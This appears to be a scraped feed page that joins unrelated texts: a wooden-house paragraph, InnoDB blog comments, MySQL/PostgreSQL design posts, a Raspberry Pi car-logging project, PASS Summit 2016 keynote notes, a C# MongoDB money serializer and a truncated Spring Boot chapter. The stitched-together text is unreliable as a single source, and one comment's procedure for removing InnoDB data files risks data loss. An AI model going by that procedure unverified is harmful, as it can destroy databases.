    Using wood panels as the principal building material reduced the project’s overall cost and footprint because the wooden beams and wall panels were cut and varnished in a nearby workshop. Prefabricated concrete was used to embed the support beams, which were then clad in wooden panels. In fact, wood covers just about everything in the home, from the walls and flooring to the ceiling and partitions. Sustainable materials such as cellulose wadding and wood fibers were even used to insulate the home.


          Comment on InnoDB per-table tablespaces – file for each innodb table by Team Roster        
Best you should change the post title InnoDB per-table tablespaces – file for each innodb table | Lamp, scalability, opensource to more catching for your subject you create. I loved the post however.
          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
And add innodb_file_per_table to my.cnf file, of course.
          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
It works when you: * drop the foreign keys of the InnoDB tables * alter the InnoDB tables to MyISAM * stop mysql server * remove/move the ibdata* and ib_logfile* files * start mysql server (it should appear a new ibdata1 file with 10M filesize) * alter the previously altered tables back to InnoDB * create the foreign keys removed at the first step
          Comment on InnoDB per-table tablespaces – file for each innodb table by Ranjeet Walunj        
@abul : yeah .. but why do u want to delete ibdata1 after step 3 and 4 ? Step 1 and 2 will help you regain space ... step 3 and 4 will help you optimize tables and have separate innodb files for them
          Comment on InnoDB per-table tablespaces – file for each innodb table by Abul Hassan        
Good Post. Thanks for the information. My question is, what will happen if we delete ibdata1 file after we do step 3 and 4? Could we regain the space again?
          Comment on InnoDB per-table tablespaces – file for each innodb table by Kelly Brown        
Hi, gr8 post thanks for posting. Information is useful!
          The case for a new open-source relational database        
I've been thinking about a new open-source relational database for a while, and here's my thoughts as to why the world needs one, even though PostgreSQL and MySQL would seem to have a lock, with SQLite doing well in small devices.

First, some strengths and weaknesses of each:

1. PostgreSQL is very good at query optimization, and has a large and powerful set of query answering facilities. Where it isn't so wonderful is its storage engine, where the old "versioned" storage manager, complete with its vacuum cleaner - which sucked in 1990 when I worked on it and is still a operational PITA - still resides. It "works", and is serviceable for many applications (particularly large archival apps, where deletes and updates are done rarely or never), but is a huge problem for always-up OLTP apps.

2. OTOH, MySQL has the opposite problem: its parser and executor are lame (gee, will they ever figure out how to cache constant subquery results? How about hashjoins? Type checking? Not defaulting to friggin case-insensitive Swedish as the default collation?), but its open storage architecture allows lots of interesting storage engines, and InnoDB's index-organized structure kicks butt if you know how to use it. We use MySQL/InnoDB for a very large, SaaS database ourselves with both heavy OLTP components and heavy archival search components. To get around its sucky top-level, I have to carefully police all significant queries, make extensive use of optimizer hints, and work with developers to make certain they aren't doing something problematic like using a subquery that is always treated as correlated, etc.

In a dream-world, I could figure out a way to hook up PostgreSQL's top level with the InnoDB storage engine. That would be a powerful relational engine.

That said, there are things neither engine, and no relational db engine in the open-source world that I'm aware of, do very well:

1. Better handling of in-memory tables and in-memory indexes. One thing I did that was very popular in DeviceSQL was an efficient in-memory hashed and ordered index on a persistent table. It is very popular with customers and was extremely fast.
2. Fast bootup, even after ungraceful shutdown. Given that Serious Databases increasingly exist on small, portable devices, fast bootup is needed. Fast bootup has all sorts of implications for transaction handling, so it has to be "designed in" from the beginning.
3. An open storage architecture is a must, both for base storage and for indexes (and the open-storage architecture should allow index-organized base storage as well).
4. "Vector" index query answering facilities. One of the biggest limitations on relational database execution engines today is the inability to use multiple indexes on the same table. A "vector index strategy" would allow large tables to be searched by multiple parameters without needing to "pick a winner" (and often there isn't any good choices to pick...)

More later...
          MySQL, Postgres, and InnoDB: Some Critiques of Index Organized Tables        
This discussion of InnoDB versus Postgres' storage engine (and index organized table structures generally, as this could also apply to Oracle's IOT's) is worth a careful read. Since our schema makes heavy use of the index organized property of InnoDB - and since I have a bit of a fanboy wish to use Postgres as I worked on it for a few years versus helping to buy Larry another yacht - here's some discussion of where index organized structures add value and some criticisms of my own.

Even though one used a primary key definition to define the "index organization structure", in my opinion, the real power of index organized table structures is in larger, "bulk" searches over single-record lookups of the sort one would typically do with a primary key. Assuming very careful schema design and querying, the advantage with "bulk" searches is that a single B-tree ingress is all that is necessary to answer the search, while secondary indexes require at least some indirection into the table, which gets expensive if the working set involves millions of records (as it often does, at least in our case). See the below discussion on telemetry schemas for more.

Index Organized Table Wishlist

  1. Have an explicit "ORGANIZATION KEY" table declaration (or some such) and not rely on the PRIMARY KEY. If the organization key doesn't completely define the storage, allow "..." or something to allow for an incompletely defined organization key. If "ORGANIZATION KEY" is omitted, default to the PRIMARY KEY.
  2. Secondary indexes should have the option of using storage row-ids to "point at" the main rows as organization keys can be relatively long, and require walking two different B-trees to find the recs. Implementing this could be hard and make inserts slow as otherwise unchanged rows can "move around" while the B-tree is having stuff done to it - requiring secondary indexes to have pointers redone - so there's a design trade-off here. In our environment, we mostly avoid secondary indexes in favor of "search tables", which are basically user-managed indexes.
If I get the energy to do an open-source project, I want to do what I call "vector indexes" and a "vectoring execution engine" that we've basically implemented in user code in our app. If we had "vector indexes", we wouldn't be so reliant on index-organized table structures.
          Partition pruning and WHERE clauses        
If you're using lots of partitions, you'll want to make sure that partition pruning is used, and you aren't always guaranteed that it will be. We had a situation where we have a set of very large (potentially >1B rows, currently ~250M rows) tables that are partitioned on "Unix days" (Unix time rounded to days), that have several hundred partitions, using "hash" partitioning to simplify maintenance. So, to simplify, our table looks something like

create table mytable (id integer, unix_day mediumint, primary key (id, unix_day**)) engine=innodb partition by hash (unix_day) partitions 500;

Let's load up a with 1B records. Assuming even distribution, we'll have 2M records in each partition. Now, let's run the following query, to fetch everything in the past 3 days (ignoring timezones for simplicity):

set @today = unix_timestamp(now()) div 86400;

select id from mytable
where unix_day >= @today - 3;


Since we're using "hash" partitioning, this will end up being a monster table scan on the entire table, taking hours to complete. The problem is this query can't be "pruned" because "hash" partitioning doesn't have an implied order.

However, if we run this query

select id from mytable where unix_day in (@today-3, @today - 2, @today - 1, @today);

we'll get good pruning and only four partitions will be searched. Note that MySQL is also good at exploding small integer ranges (ie, ranges less than the number of partitions) into what amounts to an IN-list for partition pruning purposes, so the above query, which is difficult to code in an app, can be converted to

select id from mytable where unix_day between @today - 3 and @today;

and only four partitions will be searched.

**Note that this "stupid" PRIMARY KEY declaration is necessary to have InnoDB let us use unix_day as a partition key, as partition keys must be part of an existing key (primary or otherwise). Making it a separate KEY - and additional index - would be hugely expensive and unnecessary in our app.
          InnoDB versus MyISAM: large load performance        
The conventional wisdom regarding InnoDB versus MyISAM is that InnoDB is faster in some contexts, but MyISAM is generally faster, particularly in large loads. However, we ran an experiment in which a large bulk load of a mysqldump output file, which is basically plain SQL consisting of some CREATE TABLE and CREATE INDEX statements, and a whole lot of huge INSERT statements, in which InnoDB was the clear winner over MyISAM.

We have a medium-sized database that we have to load every month or so. When loaded, the database is about 6GB in MyISAM, and about 11G in InnoDB, and has a couple hundred million smallish records. The MySQL dump file itself is about 5.6G, and had "ENGINE=MyISAM" in its CREATE TABLE statements that we "sed" substituted to "ENGINE=InnoDB" to do the InnoDB test.

Load time with ENGINE=MyISAM: 203 minutes (3 hours 23 minutes)
Load time with ENGINE=InnoDB: 40 minutes

My guess is that the performance difference is due to the fact that these tables have lots of indexes. Every table has a PRIMARY KEY, and at least one secondary index. InnoDB is generally better at large index loads than MyISAM in our experience, so the extra time MyISAM spends doing index population swamps its advantage in simple load time to the base table storage.

Given our experimental results, we'll now use InnoDB for this table.
          INNODB: When do partitions improve performance?        
PARTITIONs are one of the least understood tools in the database design toolkit.

As an index-organized storage mechanism, InnoDB's partitioning scheme can be extremely helpful for both insert/load performance and read performance in queries that leverage the partition key.

In InnoDB, the best way to think of a partitioned table is as a hash table with separate B-trees in the individual partitions, with the individual B-trees structured around the PRIMARY KEY (as is always the case with InnoDB-managed tables). The partition key is the "bucketizer" for the hash table.

Since the main performance issue in loading data into an InnoDB table is the need to figure out where to put new records in an existing B-Tree structure, a partition scheme that allows new data to go into "new" partitions, with "short" B-trees, will dramatically speed up performance. Also, the slowest loads will be bounded by the maximum size of an individual partition.

A partition scheme I generally like to use is one with several hundred partitions, driven by "Unix days" (ie, Unix time divided by 86400 seconds). Since data is typically obsoleted or archived away after a couple of years, this will allow at most a couple of days of data in a partition.

The partition key needs to be explicitly used in the WHERE clauses of queries in order to take advantage of partition pruning. Note that even if you can figure out how to derive the partition key from other data in the WHERE clause, the query optimizer often can't (or at least isn't coded to do so), so it's better to explicitly include it in the WHERE clause by itself, ANDed with the rest of the WHERE.

Some notes on using MySQL partitions:

1. Secondary indexes won't typically go much faster. Shorter B-trees will help some, but not all that much, particularly since it's hard to do both partition pruning and use a secondary index against the same table in a single query.
2. In MySQL, don't create a secondary index on the partition key, as it will effectively "hide" the partition key from MySQL and result in worse performance than if the partition is directly used.
3. Partitions can't be easily "nested". While you can use a computed expression to map your partition in more recent versions of MySQL, it is difficult for MySQL to leverage one well for the purposes of partition pruning. So, keeping your partitions simple and just using them directly in queries is preferable.
4. If you use "Unix day" as a partition, you'll want to explicitly include it in a query, even if you already have a datetime value in the query and the table. This may make queries look slightly ugly and redundant, but they'll run a lot faster.
5. The biggest "win" in searching from partitioning will be searches on the PRIMARY KEY that also use the partition key, allowing for partition pruning. Also, searches that otherwise would result in a table scan can at least do a "short" table scan only in the partitions of interest if the partition key is used in the query.
          PRIMARY KEYs in INNODB: Choose wisely        
PRIMARY KEYs in InnoDB are the primary structure used to organize data in a table. This means the choice of the PRIMARY KEY has a direct impact on performance. And for big datasets, this performance choice can be enormous.

Consider a table with a primary search attribute such as "CITY", a secondary search attribute "RANK", and a third search attribute "DATE".

A simple "traditional" approach to this table would be something like

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (id)
) engine=innodb;


create index lookup_index
on myinfo (city, rank, info_date);


InnoDB builds the primary table data store in a B-tree structure around "id", as it's the primary key. The index "index_lookup" contains index records for every record in the table, and the primary key of the record is stored as the "lookup key" for the index.

This may look OK at first glance, and will perform decently with up to a few million records. But consider how lookups on myinfo by a query like

select * from myinfo where city = 'San Jose' and rank between 5 and 10 and date > '2011-02-15';

are answered by MySQL:

1. First, the index B-tree is walked to find the records of interest in the index structure itself.
2. Now, for every record of interest, the entire "primary" B-tree is walked to fetch the actual record values.

This means that N+1 B-trees are walked for N result records.

Now consider the following change to the above table:

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (city, rank, info_date, id)
) engine=innodb;

create index id_lookup on myinfo (id);

The primary key is now a four-column primary key, and since "id" is distinct, it satisfies the uniqueness requirements for primary keys. The above query now only has to walk a single B-tree to be completely answered. Note also that searches against CITY alone or CITY+RANK also benefit.

Let's plug in some numbers, and put 100M records into myinfo. Let's also say that an average search returns 5,000 records.

Schema 1: (Index lookup + Primary Key lookup from index):
Lg (100M) * 1 + 5000 * Lg (100M) = 132903 B-tree operations.

Schema 2: (Primary Key lookup only):
Lg(100M) * 1 = 26 B-tree operations. (Note that this single B-tree ingress operation will fetch 5K records)

So, for this query, Schema 2 is over 5,000 times faster than Schema 1. So, if Schema 2 is answered in a second, Schema 1 will take nearly two hours.

Note that we've played a bit of a trick here, and now lookups on "ID" are relatively expensive. But there are many situations where a table identifier is rarely or never looked up, but used as the primary key as "InnoDB needs a primary key".

See also Schema Design Matters

          Some simple schema design mistakes        
1. Not paying attention when determining the primary key, particularly if using index-organized primary storage structures like InnoDB or Oracle's "ORGANIZATION INDEX" tables.

2. Thinking that defining an index on multiple columns means that each column is "indexed". Multi-column indexes give you a search structure that is organized from the leftmost column to the rightmost column in the CREATE INDEX (or KEY()) statement, so if the leftmost column(s) aren't used in a given query, columns in the "middle" can't be used.
          Comment on Why I am Tempted to Replace Cassandra With DynamoDB by Matt Hardy        
How about Cassandra vs Couchbase or MongoDB?
          Will SQL just die already?        
With tons of new No-SQL database offerings everyday, developers & architects have a lot of options. Cassandra, Mongodb, Couchdb, Dynamodb & Firebase to name a few. Join 33,000 others and follow Sean Hull on twitter @hullsean. What’s more in the data warehouse space, you have Hadoop, which can churn through terabytes of data and get … Continue reading Will SQL just die already?
          Playing with Pi        

A few months ago I decided to join the party and pickup a Raspberry Pi. It's a $25 full fledged ARM based computer the size of a credit card. There's also a $35 version, of which I ended up buying a handful so far. Due to the cost, this allows you to use a computer in dedicated applications where it otherwise wouldn't be justified or practical. Since then I've been pouring over the different things people have done with their Pi. Here are some that interest me:

  • Setting up security cameras or other dedicated cameras like a traffic cam or bird feeder camera
  • RaspyFi - streaming music player
  • Offsite backup
  • Spotify server
  • Carputer - blackbox for your car
  • Dashcam for my car
  • Home alarm system
  • Digital signage for the family business
  • Console emulator for old school consoles
  • Grocery inventory tracker

Since the Pi runs an ARM based version of Linux, I'm already familiar with practically everything on that list. The OS I've loaded is Raspbian, a Debian variant. This makes it a lot easier to get up and running with.

After recently divesting myself of some large business responsibilities, I've had more personal time to dedicate to things like this. Add in the vacation I took during Christmas and New Years and I had the perfect recipe to dive head-first into a Pi project. What I chose was something that I've always wanted.

The database and Big Data lover in me wants data, lots of it. So I've gone with building a black box for my car that runs all the time the car is on, and logs as much data as I can capture. This includes:

  • OBD2
  • GPS
  • Dashcam
  • and more

Once you've got a daemon running, and the inputs are being saved then the rest is all just inputs. Doesn't matter what it is. It's just input data.

My initial goal is to build a blackbox that constantly logs OBD2 data and stores it to a database. Looking around at what's out there for OBD2 software, I don't see anything that's built for long term logging. All the software out there is meant for 2 use cases: 1)live monitoring 2)tuning the ECU to get more power out of the car. What I want is a 3rd use case: long term logging of all available OBD2 data to a database for analysis.

In order to store all this data I decided to build an OBD2 storage architecture that's comprised of

  • MySQL database
  • JSON + REST web services API
  • SDK that existing OBD2 software would use to store the data it's capturing
  • Wrapping up existing open source OBD2 capture data so it runs as a daemon on the Pi
  • Logging data to a local storage buffer, which then gets synced to the aforementioned cloud storage service when there's an internet connection.

Right now I'm just doing this for myself. But I'm also reaching out to developers of OBD2 software to gauge interest in adding this storage service to their work. In addition to the storage, an API can be added for reading back the data such as pulling DTS (error) codes, getting trends and summary data, and more.

The first SDK I wrote was in Python. It's available on GitHub. It includes API calls to register an email address to get an API key. After that, there are some simple logging functions to save a single PID (OBD2 data point such as RPM or engine temp). Since this has to run without an internet connection I've implemented a buffer. The SDK writes to a buffer in local storage and when there's any internet connection a background sync daemon pulls data off the buffer, sends it to the API and removes the item from the buffer. Since this is all JSON data and very simple key:value data I've gone with a NoSQL approach and used MongoDB for the buffer.

The API is built in PHP and runs on a standard Linux VPS in apache. At this point the entire stack has been built. The code's nowhere near production-ready and is missing some features, but it works enough to demo. I've built a test utility that simulates a client car logging 10 times/second. Each time it's logging 10 different PIDs. This all builds up in the local buffer and the sync script then clears it out and uploads it to the API. With this estimate, the client generates 100 data points per second. For a car being driven an average of 101 minutes per day, that's 606,000 data points per day.

The volume of data will add up fast. For starters, the main database table I'm using stores all the PIDs as strings and stores each one as a separate record. In the future, I'll evaluate pivoting this data so that each PID has it's own field (and appropriate data type) in a table. We'll see which method proves more efficient and easier to query. The OBD2 spec lists all the possible PIDs. Car manufacturers aren't required to use them all, and they can add in their own proprietary ones too. Hence my ambivalence for now about creating a logging table that contains a field for each PID. If most of the fields are empty, that's a lot of wasted storage. 

Systems integration is much more of a factor in this project than coding each underlying piece. Each underlying piece, from what I've found, has already been coded somewhere by some enthusiast. The open source Python code already exists for reading OBD2 data. That solves a major coding headache and makes it easier to plug my SDK into it.

There are some useful smartphone apps that can connect to a Bluetooth OBD2 reader to pull the data. Even if they were to use my SDK, it's still not an ideal solution for logging. In order to log this data, you need a dedicated device that's always on when the car's on and always logging. Using a smartphone can get you most of the way there, but there'll be gaps. That's why I'm focusing on using my Pi as a blackbox for this purpose.


          PASS Summit 2016 – Blogging again – Keynote 1        

.So I’m back at the PASS Summit, and the keynote’s on! We’re all getting ready for a bunch of announcements about what’s coming in the world of the Microsoft Data Platform.

First up – Adam Jorgensen. Some useful stats about PASS, and this year’s PASSion Award winner, Mala Mahadevan (@sqlmal)

There are tweets going on using #sqlpass and #sqlsummit – you can get a lot of information from there.

Joseph Sirosh – Corporate Vice President for the Data Group, Microsoft – is on stage now. He’s talking about the 400M children in India (that’s more than all the people in the United States, Mexico, and Canada combined), and the opportunities because of student drop-out. Andhra Pradesh is predicting student drop-out using new ACID – Algorithms, Cloud, IoT, Data. I say “new” because ACID is an acronym database professionals know well.

He’s moving on to talk about three patterns: Intelligence DB, Intelligent Lake, Deep Intelligence.

Intelligence DB – taking the intelligence out of the application and moving it into the database. Instead of the application controlling the ‘smarts’, putting them into the database provides models, security, and a number of other useful benefits, letting any application on top of it. It can use SQL Server, particularly with SQL Server R Services, and support applications whether in the cloud, on-prem, or hybrid.

Rohan Kumar – General Manager of Database Scripts – is up now. Fully Managed HTAP in Azure SQL DB hits General Availability on Nov 15th. HTAP is Hybrid Transactional / Analytical Processing, which fits really nicely with my session on Friday afternoon. He’s doing a demo showing the predictions per second (using SQL Server R Services), and how it easily reaches 1,000,000 per second. You can see more of this at this post, which is really neat.

Justin Silver, a Data Scientist from PROS comes onto stage to show how a customer of theirs handles 100 million price requests every day, responding to each one in under 200 milliseconds. Again we hear about SQL Server R Services, which pushes home the impact of this feature in SQL 2016. Justin explains that using R inside SQL Server 2016, they can achieve 100x better performance. It’s very cool stuff.

Rohan’s back, showing a Polybase demo against MongoDB. I’m sitting next to Kendra Little (@kendra_little) who is pretty sure it’s the first MongoDB demo at PASS, and moving on to show SQL on Linux. He not only installed SQL on Linux, but then restored a database from a backup that was taken on a Windows box, connected to it from SSMS, and ran queries. Good stuff.

Back to Joseph, who introduces Kalle Hiitola from Next Games – a Finnish gaming company – who created a iOS game that runs on Azure Media Services and DocumentDB, using BizSpark. 15 million installs, with 120GB of new data every day. 11,500 DocumentDB requests per second, and 43 million “Walkers” (zombies in their ‘Walking Dead’ game) eliminated every day. 1.9 million matches (I don’t think it’s about zombie dating though) per day. Nice numbers.

Now onto Intelligent Lake. Larger volumes of data than every before takes a different kind of strategy.

Scott Smith – VP of Product Development from Integral Analytics – comes in to show how Azure SQL Data Warehouse has allowed them to scale like never before in the electric-energy industry. He’s got some great visuals.

Julie Koesmarno on stage now. Can’t help but love Julie – she’s come a long way in the short time since leaving LobsterPot Solutions. She’s done Sentiment Analysis on War & Peace. It’s good stuff, and Julie’s demo is very popular.

Deep Intelligence is using Neural Networks to recognise components in images. eSmart Systems have a drone-based system for looking for faults in power lines. It’s got a familiar feel to it, based on discussions we’ve been having with some customers (but not with power lines).

Using R Services with ML algorithms, there’s some great options available…

Jen Stirrup on now. She’s talking about Pokemon Go and Azure ML. I don’t understand the Pokemon stuff, but the Machine Learning stuff makes a lot of sense. Why not use ML to find out where to find Pokemon?

There’s an amazing video about using Cognitive Services to help a blind man interpret his surroundings. For me, this is the best demo of the morning, because it’s where this stuff can be really useful.

SQL is changing the world.

@rob_farley


          Eclipse Newsletter - BIRT and Big Data        
Find out how to use BIRT to visualize data from Hadoop, Cassandra and MongoDB in this month's issue of the Eclipse Newsletter.
          Yet another MongoDB Map Reduce tutorial | MongoVUE        
http://www.mongovue.com/2010/11/03/yet-another-mongodb-map-reduce-tutorial/
          Saving prices as decimal in mongodb        

When working with prices in C#, you should always work with the 'decimal' type.
Working with the 'double' type can lead to a variety of rounding errors when doing calculations, and it is intended more for scientific and mathematical computation.

(I don't want to go into details about what problems this can cause exactly, but you can read more about it here :
http://stackoverflow.com/questions/2129804/rounding-double-values-in-c-sharp
http://stackoverflow.com/questions/15330988/double-vs-decimal-rounding-in-c-sharp
http://stackoverflow.com/questions/693372/what-is-the-best-data-type-to-use-for-money-in-c
http://pagehalffull.wordpress.com/2012/10/30/rounding-doubles-in-c/ )

I am currently working on a project that involves commerce and prices, so naturally I used 'decimal' for all price types.
Then I headed to my db, which in my case is mongodb, and the problem arose.
MongoDB doesn't support 'decimal'!! It only supports the double type.

Since I'd rather avoid saving it as a double for the reasons stated above, I had to think of a better solution.
I decided to save all the prices in the db as Int32, storing the prices in 'cents'.

This means I just need to multiply the values by 100 when inserting into the db, and divide by 100 when retrieving. This should never cause any rounding problems, and is pretty much straightforward. I don't even need to worry about sorting, or any other query for that matter.

But... I don't want ugly code doing all these conversions from cents to dollars in every place...

I'm using the standard C# MongoDB driver (https://github.com/mongodb/mongo-csharp-driver), which gives me the ability to write a custom serializer for a specific field.
This is a great solution, since it's the lowest-level part of the code that deals with the db, and that means all my entities will be using 'decimal' everywhere.

This is the code for the serializer :

[BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
public class MongoDbMoneyFieldSerializer : IBsonSerializer
{
    // Reads the Int32 "cents" value stored in the database and converts it back to a decimal amount.
    public object Deserialize(BsonReader bsonReader, Type nominalType, IBsonSerializationOptions options)
    {
        var dbData = bsonReader.ReadInt32();
        return (decimal)dbData / (decimal)100;
    }

    public object Deserialize(BsonReader bsonReader, Type nominalType, Type actualType, IBsonSerializationOptions options)
    {
        var dbData = bsonReader.ReadInt32();
        return (decimal)dbData / (decimal)100;
    }

    public IBsonSerializationOptions GetDefaultSerializationOptions()
    {
        return new DocumentSerializationOptions();
    }

    // Converts the decimal amount to whole cents and writes it as an Int32.
    public void Serialize(BsonWriter bsonWriter, Type nominalType, object value, IBsonSerializationOptions options)
    {
        var realValue = (decimal)value;
        bsonWriter.WriteInt32(Convert.ToInt32(realValue * 100));
    }
}


And then all you need to do is add the custom serializer to the fields which are prices, like this:

public class Product
{
    public string Title { get; set; }
    public string Description { get; set; }

    [BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
    public decimal Price { get; set; }

    [BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
    public decimal MemberPrice { get; set; }

    public int Quantity { get; set; }
}

That's all there is to it.


          Big Data – infrastructure DBA – MongoDB and cloud environment        
A medical imaging SaaS company is seeking a talented infrastructure DBA. You will work with big data, scale the company's data set to millions of samples, perform large-scale data analysis and research, and handle performance, scale, availability, accuracy and monitoring.
          Laravel MVC frameWork         
MVC frameworks: up to now I have always used Smarty + ADOdb.
          Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4)        
In the last few posts for this series on computing twitter influence, we’ve reviewed some of the considerations in calculating a base metric for influence and how to acquire the necessary data to begin analysis. This post finishes up all of the prerequisite machinery before the real data science fun begins by introducing MongoDB as a […]
          "A Minimalist Guide to Spring Boot", Chapter 5: How Spring Boot Auto-Configuration Works [reposted]        
from:http://www.jianshu.com/p/ccadc2bdb6d7

Chapter 5: How Spring Boot Auto-Configuration Works

5.1 The core component modules of Spring Boot

First, let's do a quick count of the Java source files in the core Spring Boot projects:

We cd into the root directory of the spring-boot-autoconfigure project and run:

$ tree | grep -c .java$
Module                       Java file count
spring-boot                  551
spring-boot-actuator         423
spring-boot-autoconfigure    783
spring-boot-devtools         169
spring-boot-cli              180
spring-boot-tools            355

We can see that spring-boot-autoconfigure has 783 Java files, while the core spring-boot project has 551. From these file counts we can roughly make out the core building blocks of the Spring Boot framework:

spring-boot-autoconfigure spring-boot spring-boot-tools

We import the Spring Boot source code into IntelliJ IDEA and inspect the full dependency graph of each artifact.

IDEA has a Maven Projects window, usually found on the right-hand side; if it is not there, open it from the menu bar: View > Tool Windows > Maven Projects.

Select the Maven module you want to analyze (an IDEA module corresponds to an Eclipse project) and right-click Show Dependencies; a complete dependency diagram for that module appears, very clear and detailed.

For example, the dependency diagram for spring-boot-starter-freemarker looks like this:


In the pom of spring-boot-build, we can see:

<modules>
    <module>spring-boot-dependencies</module>
    <module>spring-boot-parent</module>
    <module>spring-boot-tools</module>
    <module>spring-boot</module>
    <module>spring-boot-test</module>
    <module>spring-boot-autoconfigure</module>
    <module>spring-boot-test-autoconfigure</module>
    <module>spring-boot-actuator</module>
    <module>spring-boot-devtools</module>
    <module>spring-boot-docs</module>
    <module>spring-boot-starters</module>
    <module>spring-boot-actuator-docs</module>
    <module>spring-boot-cli</module>
</modules>

Within spring-boot-dependencies, the Spring Boot project maintains a large set of managed dependencies. The versions of these dependencies have been used in practice and tested together, so they do not conflict with each other. This alone greatly reduces the chance of jar conflicts during Spring development. spring-boot-parent depends on spring-boot-dependencies.

Below is a brief introduction to the Spring Boot sub-modules.

spring-boot

The core Spring Boot project.

spring-boot-starters

The project that provides Spring Boot's starters.

spring-boot-autoconfigure

The core project that implements Spring Boot's auto-configuration.

spring-boot-actuator

Provides supporting operational features for Spring Boot applications, such as:

  • Endpoints, for monitoring and managing the state of a Spring Boot application
  • HealthIndicator, health indicators for a Spring Boot application
  • Metrics support
  • Remote shell support

spring-boot-tools

Provides the common tool set for Spring Boot developers; for example, spring-boot-gradle-plugin and spring-boot-maven-plugin live in this project.

spring-boot-cli

The Spring Boot command-line tool, which can be used for rapid prototyping with Spring. You can use it to run Groovy scripts directly. If you do not like Maven or Gradle, Spring provides the CLI (Command Line Interface) to develop and run Spring applications; you can use it to run Groovy scripts and even write custom commands.

5.2 SpringBoot Starters

The starter concept in Spring Boot is a very important mechanism: it does away with the tangled configuration of the past by consolidating it into starters. The application only needs to pull in the starter jar, and Spring Boot automatically discovers the information it needs to load.

Starters free us from juggling dependency libraries and configuring all kinds of settings. Spring Boot automatically discovers the beans it needs from the classes on the classpath and wires them in.

For example, if you want to use Spring with JPA for database access, you only need to depend on spring-boot-starter-data-jpa; a small sketch of what that enables follows below.
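
As a rough illustration (not from the original text), here is a minimal sketch of the kind of code that works once spring-boot-starter-data-jpa and a JDBC driver are on the classpath; the Customer entity and CustomerRepository names are hypothetical:

import java.util.List;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.Id;
import org.springframework.data.jpa.repository.JpaRepository;

// Customer.java - a plain JPA entity; no XML or DataSource configuration is needed,
// because the starter pulls in Hibernate and Spring Data JPA and auto-configures them.
@Entity
public class Customer {
    @Id
    @GeneratedValue
    private Long id;
    private String name;
    // getters and setters omitted for brevity
}

// CustomerRepository.java - Spring Data JPA generates the implementation at runtime.
interface CustomerRepository extends JpaRepository<Customer, Long> {
    List<Customer> findByName(String name);
}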

Currently, the latest list of starters in the spring-boot project on GitHub (spring-boot/spring-boot-starters) is as follows:

spring-boot-starter spring-boot-starter-activemq spring-boot-starter-actuator spring-boot-starter-amqp spring-boot-starter-aop spring-boot-starter-artemis spring-boot-starter-batch spring-boot-starter-cache spring-boot-starter-cloud-connectors spring-boot-starter-data-cassandra spring-boot-starter-data-couchbase spring-boot-starter-data-elasticsearch spring-boot-starter-data-jpa spring-boot-starter-data-ldap spring-boot-starter-data-mongodb spring-boot-starter-data-mongodb-reactive spring-boot-starter-data-neo4j spring-boot-starter-data-redis spring-boot-starter-data-rest spring-boot-starter-data-solr spring-boot-starter-freemarker spring-boot-starter-groovy-templates spring-boot-starter-hateoas spring-boot-starter-integration spring-boot-starter-jdbc spring-boot-starter-jersey spring-boot-starter-jetty spring-boot-starter-jooq spring-boot-starter-jta-atomikos spring-boot-starter-jta-bitronix spring-boot-starter-jta-narayana spring-boot-starter-log4j2 spring-boot-starter-logging spring-boot-starter-mail spring-boot-starter-mobile spring-boot-starter-mustache spring-boot-starter-parent spring-boot-starter-reactor-netty spring-boot-starter-security spring-boot-starter-social-facebook spring-boot-starter-social-linkedin spring-boot-starter-social-twitter spring-boot-starter-test spring-boot-starter-thymeleaf spring-boot-starter-tomcat spring-boot-starter-undertow spring-boot-starter-validation spring-boot-starter-web spring-boot-starter-web-services spring-boot-starter-webflux spring-boot-starter-websocket

(Shell commands run in the source directory: l|awk '{print $9}' and l|awk '{print $9}'|grep -c 'starter')

There are 52 in total. The pom description of each starter project contains a corresponding introduction; for details, see the official documentation [1]. For usage examples of these starters, see spring-boot/spring-boot-samples.

For example, spring-boot-starter is described as:

Core starter, including auto-configuration support, logging and YAML

This is Spring Boot's core starter, which brings in auto-configuration support, logging and YAML. Its project dependency diagram is as follows:



As you can see, these starters are only configuration; the code that actually performs the auto-configuration lives in spring-boot-autoconfigure. In turn, spring-boot-autoconfigure depends on the spring-boot project, which is the core of Spring Boot.

Based on the jars on your classpath, Spring Boot tries to guess and configure the beans you are likely to need.

For example, if tomcat-embedded.jar is on your classpath, you probably want a TomcatEmbeddedServletContainerFactory bean (Spring Boot obtains an EmbeddedServletContainerFactory to start the corresponding web server; the two commonly used implementations are TomcatEmbeddedServletContainerFactory and JettyEmbeddedServletContainerFactory). A sketch of overriding that factory yourself follows below.
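
As a hedged illustration (not from the original text, and assuming a Spring Boot 1.x setup where these classes live under org.springframework.boot.context.embedded), defining your own factory bean is enough to take over from the auto-configured one:

import org.springframework.boot.context.embedded.tomcat.TomcatEmbeddedServletContainerFactory;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class EmbeddedTomcatConfig {

    // Because this bean is present, Spring Boot backs off and uses it instead of
    // creating its own TomcatEmbeddedServletContainerFactory.
    @Bean
    public TomcatEmbeddedServletContainerFactory servletContainerFactory() {
        TomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();
        factory.setPort(9090); // example customization: listen on port 9090
        return factory;
    }
}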

All the other Spring Boot starters depend on this spring-boot-starter. For example, the dependency tree of spring-boot-starter-actuator is shown below:


5.3 How @EnableAutoConfiguration auto-configuration works

@EnableAutoConfiguration turns on auto-configuration of the Spring application context. The annotation imports an EnableAutoConfigurationImportSelector class, which reads, from spring.factories, the fully qualified class names stored under the EnableAutoConfiguration key. (A minimal application class that pulls this annotation in is sketched below.)
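
For orientation, here is a minimal sketch (not from the original text) of a typical entry class; @SpringBootApplication is a meta-annotation that includes @EnableAutoConfiguration, so running this class triggers the spring.factories lookup described above:

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

// @SpringBootApplication combines @Configuration, @EnableAutoConfiguration and @ComponentScan.
@SpringBootApplication
public class MyApplication {

    public static void main(String[] args) {
        // Starts the application context and applies the matching auto-configurations.
        SpringApplication.run(MyApplication.class, args);
    }
}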

